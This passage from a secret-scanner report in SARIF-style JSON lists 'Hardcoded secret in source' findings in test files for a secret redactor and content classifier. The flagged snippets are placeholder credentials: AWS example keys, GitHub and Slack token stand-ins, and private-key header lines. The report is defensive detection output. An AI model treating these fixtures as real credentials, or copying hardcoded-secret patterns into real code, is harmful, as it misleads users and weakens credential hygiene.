"aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/secret-redactor.test.ts"}, "region": {"startLine": 61}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16649, "scanner": "repobility", "fingerprint": "eece3cf93ae88a265b1cc86236dc7c26", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/secret-redactor.test.ts"}, "region": {"startLine": 105}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16648, "scanner": "repobility", "fingerprint": "dc9fdf30f36f020363dfa6781807360c", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "AKIAIOSFODNN7EXAMPLE", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/secret-redactor.test.ts"}, "region": {"startLine": 57}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16647, "scanner": "repobility", "fingerprint": "25b6301cf821eb8192eb481add82aafd", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "AKIAIOSFODNN7EXAMPLE", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", 
"aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/secret-redactor.test.ts"}, "region": {"startLine": 54}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16646, "scanner": "repobility", "fingerprint": "3dd750610aa61cdf94e9a64b6a169128", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/machine-identity.test.ts"}, "region": {"startLine": 344}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16645, "scanner": "repobility", "fingerprint": "25dd88cbf028bfed7656dfa0514c0de9", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/machine-identity.test.ts"}, "region": {"startLine": 343}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16644, "scanner": "repobility", "fingerprint": "f29ba73329165ccbc6b2c61aadce8857", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": 
"hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/machine-identity.test.ts"}, "region": {"startLine": 92}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16643, "scanner": "repobility", "fingerprint": "5b0676b40ac2de30b58e9f77dd95d4e7", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/machine-identity.test.ts"}, "region": {"startLine": 53}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16642, "scanner": "repobility", "fingerprint": "56cc8774e2fb9ab3305d6b3b11de9810", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ContentClassifier.test.ts"}, "region": {"startLine": 452}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16641, "scanner": "repobility", "fingerprint": "5485c6be35589efdd51678c5706fdd61", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": 
[{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ContentClassifier.test.ts"}, "region": {"startLine": 438}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16640, "scanner": "repobility", "fingerprint": "f879fdab13d028a936488e6b592b61da", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ContentClassifier.test.ts"}, "region": {"startLine": 356}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16639, "scanner": "repobility", "fingerprint": "95b716dcc5aa612a7b0204bd05197e71", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ContentClassifier.test.ts"}, "region": {"startLine": 163}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16638, "scanner": "repobility", "fingerprint": "beb551acc79f3ea3f9d5d174792aaaa3", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN OPENSSH PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": 
{"artifactLocation": {"uri": "tests/unit/ContentClassifier.test.ts"}, "region": {"startLine": 154}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16637, "scanner": "repobility", "fingerprint": "84d2be220d2dcd5bd58dfc232cf99b93", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN EC PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ContentClassifier.test.ts"}, "region": {"startLine": 145}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16636, "scanner": "repobility", "fingerprint": "488c0d37df2fa07f4b91a39a9e1ce992", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN RSA PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ContentClassifier.test.ts"}, "region": {"startLine": 135}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16635, "scanner": "repobility", "fingerprint": "c1ce5f8e8805cce647155db1ca3be802", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "xoxb-1234567890123-abcdefghijklmnop", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": 
{"uri": "tests/unit/ContentClassifier.test.ts"}, "region": {"startLine": 104}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16634, "scanner": "repobility", "fingerprint": "1b2e9f13a55d112acf3c65ed156b9779", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghij", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ContentClassifier.test.ts"}, "region": {"startLine": 85}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16633, "scanner": "repobility", "fingerprint": "3793870afba480ce028b47d391e1a1eb", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "AKIAIOSFODNN7EXAMPLE", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ContentClassifier.test.ts"}, "region": {"startLine": 113}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16632, "scanner": "repobility", "fingerprint": "e739da4eebe8fc496bbbc0675ec517c4", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "ghp_aabbccddee11223344556677889900aabbcc", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": 
"tests/integration/security-wiring.test.ts"}, "region": {"startLine": 149}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16631, "scanner": "repobility", "fingerprint": "fe0e9f6d79253fc908a2a1792f64b5d1", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN RSA PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/integration/output-privacy-routing.test.ts"}, "region": {"startLine": 243}}}]}]}]}